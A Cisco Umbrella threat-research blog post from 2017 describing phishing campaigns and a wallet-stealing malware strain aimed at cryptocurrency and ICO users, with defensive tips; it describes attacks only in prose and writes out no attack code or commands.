• Skip to primary navigation
  • Skip to main content
  • Skip to footer

Cisco Umbrella

Enterprise network security

  • Contact Sales
  • Login
    • Umbrella Login
    • Cloudlock Login
  • Why Us
    • Why Cisco Umbrella
      • Why Try Umbrella
      • Why DNS Security
      • Why Umbrella SASE
      • Our Customers
      • Customer Stories
      • Why Start a Free Trial
      • Why Cisco Secure
    • Fast Reliable Cloud
      • Global Cloud Architecture
      • Cloud Network Status
      • Global Cloud Network Activity
    • Unmatched Intelligence
      • A New Approach to Cybersecurity
      • Interactive Intelligence
      • Cyber Attack Prevention
      • Umbrella and Cisco Talos Threat Intelligence
    • Extensive Integrations
      • IT Security Integrations
      • Hardware Integrations
      • Meraki Integration
      • Cisco Umbrella and SecureX
  • Products
    • Cisco Umbrella Products
      • Cisco Umbrella Cloud Security Service
      • Recursive DNS Services
      • Cisco Umbrella SIG
      • Umbrella Investigate
      • What’s New
    • Product Packages
      • Cisco Umbrella Package Comparison
      • – DNS Security Essentials Package
      • – DNS Security Advantage Package
      • – SIG Essentials Package
      • – SIG Advantage Package
      • Umbrella Support Packages
    • Functionality
      • DNS-Layer Security
      • Secure Web Gateway
      • Cloud Access Security Broker (CASB)
      • Cloud-Delivered Firewall
      • Malware Protection
      • Remote Browser Isolation (RBI)
      • Data loss prevention (DLP)
    • Man on a laptop with headphones on. He is attending a Cisco Umbrella Live Demo
  • Solutions
    • SASE Solutions
      • Cisco Umbrella SASE
      • Secure Access Service Edge (SASE)
      • What is SASE
      • What is Security Service Edge (SSE)
    • Functionality Solutions
      • Web Content Filtering
      • Secure Direct Internet Access
      • Shadow IT Discovery & App Blocking
      • Fast Incident Response
      • Unified Threat Management
      • Protect Mobile Users
      • Securing Remote and Roaming Users
    • Network Solutions
      • Guest Wi-Fi Security
      • SD-WAN Security
      • Off-Network Endpoint Security
    • Industry Solutions
      • Higher Education Security
      • K-12 Schools Security
      • Healthcare, Retail and Hospitality Security
      • Enterprise Cloud Security
      • Small Business Cybersecurity
  • Resources
    • Content Library
      • Top Resources
      • Cybersecurity Webinars
      • Events
      • Analyst Reports
      • Case Studies
      • Customer Videos
      • Datasheets
      • eBooks
      • Infographics
      • Solution Briefs
    • International Documents
      • Deutsch/German
      • Español/Spanish
      • Français/French
      • Italiano/Italian
      • 日本語/Japanese
    • For Customers
      • Support
      • Customer Success Webinars
      • Cisco Umbrella Studio
    • Get the 2022 Cloud Scurity Comparison Guide
  • Trends & Threats
    • Market Trends
      • Hybrid Workforce
      • Rise of Remote Workers
      • Secure Internet Gateway (SIG)
    • Security Threats
      • Ransomware
      • Cryptomining Malware Protection
      • Cybersecurity Threat Landscape
      • Global Cyber Threat Intelligence
      • Cyber Threat Categories and Definitions
    •  
    • Woman connecting confidently to any device anywhere
  • Partners
    • Channel Partners
      • Partner Program
      • Become a Partner
    • Service Providers
      • Secure Connectivity
      • Managed Security for MSSPs
      • Managed IT for MSPs
    •  
    • Person looking down at laptop. They are connecting and working securely
  • Blog
    • News & Product Posts
      • Latest Posts
      • Products & Services
      • Customer Focus
      • Feature Spotlight
    • Cybersecurity Posts
      • Security
      • Threats
      • Cybersecurity Threat Spotlight
      • Research
    •  
    • Register for a webinar - with illustration of connecting securely to the cloud
  • Contact Us
  • Umbrella Login
  • Cloudlock Login
  • Free Trial
Threats

Protecting ICOs and cryptocurrency users

By Artsiom Holub
Posted on September 27, 2017
Updated on July 24, 2020

Share

FacebookTweetLinkedIn

A whole new world of ICO

Bitcoin and cryptocurrencies are disrupting not just the currencies market. A newly observed trend of Internet Coin Offerings (ICOs) is changing the way VCs work with startups.  A recent Coindesk report states that the Bancor ICO set a record by raising $153 million in Ether from approximately 10,885 buyers. According to Coinschedule, 140 of the currently active ICOs have raised over two billion dollars while Reuters estimates the overall value of the coin market is over $90 billion. ICO is not yet the most popular choice among startups or investors, but interest is increasing despite the many challenges it faces.

While the largest challenges for ICO might be regulatory or legal, the focus here will be on security issues. Some of these issues include bugs in smart contracts, attacks on the websites of companies offering an ICO, errors in the implementation of multi-sig wallets, and DDOS attacks on currency networks. These contribute to about 50% of all cybercrime revenue, with the remainder being phishing schemes. Chainalysis, a blockchain analysis company, estimates the value of stolen cryptocurrencies from phishing attacks to be at 115 million dollars from over 16,900 victims.

Tracking phishing campaigns

While the main protection mechanism we rely on in identifying phishing domains is our machine learning-based model, NLPRank, which is actively enhanced to detect different crypto currency wallet phishing attempts, we continue to apply other hunting approaches that leverage additional visibility into DNS data. Pivoting around IPs, registrants, and name servers allow us to expose bullet-proof hosting infrastructures and to block emerging attacks as soon as they go live or before they are launched.

Automated phishing pivoting flow

Part of a phishing attack infrastructure exposed via this process:

Exposed Phishing infrastructure

Blockchain[.]info, MyEtherWallet[.]com, Bittrex[.]com and several ICOs are some of the targets in recent campaigns. Their infrastructures are tied to Russian, Ukraine, and Hong Kong IP address space. Most phishing attempts still come in form of mass sent spam emails with generic messages which example we can see in the picture below:

Typical message in the BTC phishing email

While majority of the phishing domains has low amount of hits, with average count between 15 and 100

Query volume to the phishing domains
Query volume to the phishing domains

Other delivery methods, such as search result poisoning, have proven to be an effective means of phishing users. This can be seen below, with a link to a phishing site listed during a google search for ‘myetherwallet’:

Poisoned Adwords example
Phishing domain served via Google Ads

Such domains are able to drive big amounts of traffic in short period of time and have better conversion rate:

Amount of traffic to phishing domain via poisoned ad

Another important aspect of the recent campaigns is the fact that malicious actors utilizing all of the newly emerged phishing methods such as homograph attacks and abuse of SSL as we can see in following picture:

Homograph attack on MyEtherWallet

IOCs

New threats are emerging

It’s not just cybercriminals who have historically been involved in phishing which are turning towards cryptocurrencies. Recently, we discovered a strain of a credential stealer which targets digital wallets stored on computers as well as online services.  This threat is delivered via malspam messages with an attached doc file that contains a Powershell script which downloads malware. Then it finds stored wallets and credentials and uploads them to the C2:

What to expect

We first observed phishing campaigns targeting cryptocurrency users in June 2016 when nobody knew what ICO was and when Bitcoin’s price was about $700. Now with Bitcoin’s price skyrocketing to nearly $4,000 and over 140 ICOs coming, we are sure that phishing attempts will continue to haunt cryptocurrency ICOs and their users. Anyone who is already a cryptocurrency user or is thinking about becoming one should be very careful. Some tips to avoid becoming a victim:

  • Don’t follow any links in messages from services, try to remember or bookmark the services that you regularly using and avoid advertised google results
  • Be suspicious of messages in social media and Slack forums, especially if they contain any URLs
  • Treat messages from bots very carefully, as they can be easily crafted by malicious actors
  • Use your common sense and check anything suspicious in the open source projects
Previous Post:

Previous Article

Next Post:

Next Article

Follow Us

  • Twitter
  • Facebook
  • LinkedIn
  • YouTube

Footer Sections

What we make

  • Cloud Security Service
  • DNS-Layer Network Security
  • Secure Web Gateway
  • Security Packages

Who we are

  • Global Cloud Architecture
  • Cloud Network Status
  • Cloud Network Activity
  • OpenDNS is now Umbrella
  • Cisco Umbrella Blog

Learn more

  • Webinars
  • Careers
  • Support
  • Cisco Umbrella Live Demo
  • Contact Sales
Umbrella by Cisco
208.67.222.222+208.67.220.220
2620:119:35::35+2620:119:53::53
Sign up for a Free Trial
  • Cisco Online Privacy Statement
  • Terms of Service
  • Sitemap

© 2022 Cisco Umbrella